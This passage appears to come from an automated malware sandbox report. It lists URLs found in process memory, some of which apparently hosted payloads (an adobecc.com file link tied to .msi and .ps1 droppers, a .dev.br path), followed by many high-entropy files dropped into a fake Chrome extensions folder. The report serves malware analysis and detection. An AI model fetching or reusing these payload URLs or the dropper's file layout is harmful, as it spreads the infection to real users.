                  Source: powershell.exe, 00000003.00000002.1836238055.00000000054C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://public.adobecc.map.fastly.net
                  Source: powershell.exe, 00000003.00000002.1836238055.0000000004DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: chrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc1321
                  Source: chrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4648
                  Source: powershell.exe, 00000003.00000002.1836238055.0000000004F36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: chrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdf
                  Source: WebExperienceHostApp.exe, 00000006.00000003.1871655421.00007DF4D38C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000002.1881441167.000001840D945000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1848678381.00007DF4D3910000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38DF000.00000004.00001000.00020000.00000000.sdmp, chrome.exe.6.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: chrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.ietf.org/rfc/rfc3447.txt
                  Source: chrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.itl.nist.gov/fipspubs/fip180-1.htm
                  Source: chrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.movable-type.co.uk/scripts/xxtea.pdf
                  Source: chrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.schneier.com/paper-blowfish-fse.html
                  Source: chrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.schneier.com/paper-twofish-paper.pdf
                  Source: powershell.exe, 00000003.00000002.1836238055.0000000004DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                  Source: powershell.exe, 00000003.00000002.1840493545.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000003.00000002.1840493545.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000003.00000002.1840493545.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: WebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000000.1878193789.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe.6.drString found in binary or memory: https://crashpad.chromium.org/
                  Source: WebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000000.1878193789.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe.6.drString found in binary or memory: https://crashpad.chromium.org/bug/new
                  Source: WebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000000.1878193789.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe.6.drString found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
                  Source: powershell.exe, 00000003.00000002.1836238055.0000000004F36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000003.00000002.1836238055.00000000054FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: WebExperienceHostApp.exe, 00000006.00000002.1880145671.00000000662BD000.00000002.00000001.01000000.00000009.sdmp, WebExperienceHostApp.exe, 00000006.00000002.1880808127.000001840D26B000.00000004.00001000.00020000.00000000.sdmp, vcruntime140_1_app.dll.1.drString found in binary or memory: https://jaspreser.dev.br/.well-known/acme-challenge/Relatorios_xls_mensal
                  Source: powershell.exe, 00000003.00000002.1840493545.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000003.00000002.1836238055.000000000540D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://public.a
                  Source: powershell.exe, 00000003.00000002.1836238055.000000000540D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://public.a(f
                  Source: powershell.exe, 00000003.00000002.1836238055.0000000004F36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836238055.000000000540D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://public.adobecc.com
                  Source: powershell.exe, 00000003.00000002.1836238055.000000000540D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1842395832.00000000075B3000.00000004.00000020.00020000.00000000.sdmp, 2024.0198840 298135.msi, scrEDC8.ps1.2.dr, 53e56a.msi.1.drString found in binary or memory: https://public.adobecc.com/files/1CRUSWG253MBK5OSUBRDH4V033RFFF
                  Source: powershell.exe, 00000003.00000002.1836238055.00000000054E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836238055.00000000050A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://public.adobecc.com/public/files/1CRUSWG253MBK5OSUBRDH4V033RFFF
                  Source: powershell.exe, 00000003.00000002.1836238055.00000000054C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://public.adobeccD
                  Source: powershell.exe, 00000003.00000002.1836238055.00000000054E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://public.adobeccD~
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownHTTPS traffic detected: 151.101.129.138:443 -> 192.168.2.4:49730 version: TLS 1.2

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\10072024.zip entropy: 7.99844439191Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.30 entropy: 7.99752780953Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.31 entropy: 7.99330413873Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.32 entropy: 7.9982834495Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.33 entropy: 7.99517225944Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.34 entropy: 7.99824305433Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.35 entropy: 7.99790959486Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.36 entropy: 7.99754718991Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.37 entropy: 7.99770998551Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.38 entropy: 7.99715340846Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.39 entropy: 7.99776227345Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.4 entropy: 7.99046230266Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.40 entropy: 7.99399133173Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.41 entropy: 7.99713861921Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.42 entropy: 7.99667055392Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.43 entropy: 7.99414348537Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.44 entropy: 7.99781831277Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.45 entropy: 7.99405865581Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.46 entropy: 7.99772013622Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.47 entropy: 7.99779597898Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.48 entropy: 7.99276827367Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.49 entropy: 7.99797758594Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.5 entropy: 7.99823961145Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.50 entropy: 7.99448796462Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.51 entropy: 7.99703199099Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.52 entropy: 7.99497283467Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.53 entropy: 7.99807423749Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.54 entropy: 7.99531409722Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.55 entropy: 7.99674971497Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.56 entropy: 7.99474871603Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.57 entropy: 7.9982840934Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.58 entropy: 7.99246215184Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.59 entropy: 7.99409874979Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.6 entropy: 7.99754562168Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.60 entropy: 7.99738800393Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.61 entropy: 7.99460856626Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.62 entropy: 7.99798601902Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.63 entropy: 7.99432159953Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.64 entropy: 7.99815865014Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.65 entropy: 7.99622567341Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.66 entropy: 7.9951105294Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.67 entropy: 7.9974883893Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.68 entropy: 7.99846732736Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.69 entropy: 7.99701507902Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.7 entropy: 7.99791398394Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.70 entropy: 7.99460045101Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.71 entropy: 7.99805655456Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.72 entropy: 7.99528518128Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.73 entropy: 7.99752214025Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.74 entropy: 7.9979940302Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.75 entropy: 7.99403941576Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.1 entropy: 7.99832754142Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.10 entropy: 7.99805977047Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.100 entropy: 7.99814455019Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.101 entropy: 7.99805920411Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.102 entropy: 7.99398437537Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.103 entropy: 7.9969613831Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.104 entropy: 7.99837165529Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.105 entropy: 7.99490534733Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.76 entropy: 7.99805834668Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.77 entropy: 7.99594269497Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.78 entropy: 7.99832335849Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.79 entropy: 7.99474667993Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.8 entropy: 7.99833024695Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.80 entropy: 7.99725858533Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.81 entropy: 7.99805459791Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.82 entropy: 7.99401136409Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.83 entropy: 7.99790203419Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.84 entropy: 7.99456452064Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.106 entropy: 7.99816744472Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.107 entropy: 7.99516845459Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.109 entropy: 7.99829884537Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.11 entropy: 7.99404648214Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.110 entropy: 7.99610810388Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.111 entropy: 7.99867490099Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.112 entropy: 7.99779818478Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.113 entropy: 7.99791560708Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.114 entropy: 7.99420401473Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.85 entropy: 7.99905143323Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.86 entropy: 7.997904103Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.87 entropy: 7.99772075385Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.88 entropy: 7.99299422459Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.89 entropy: 7.99836997664Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.9 entropy: 7.99812769595Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.90 entropy: 7.993925773Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.91 entropy: 7.99668825058Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.92 entropy: 7.9981015402Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.93 entropy: 7.99479992523Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.115 entropy: 7.9976080306Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.116 entropy: 7.9941388261Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.117 entropy: 7.99835871385Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.118 entropy: 7.99471154974Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.119 entropy: 7.99780940325Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.12 entropy: 7.99573288862Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.120 entropy: 7.99419790942Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.121 entropy: 7.99820009329Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.122 entropy: 7.9935670475Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.123 entropy: 7.99877373818Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.94 entropy: 7.99806786473Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.95 entropy: 7.99503182523Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.96 entropy: 7.99820951674Jump to dropped file
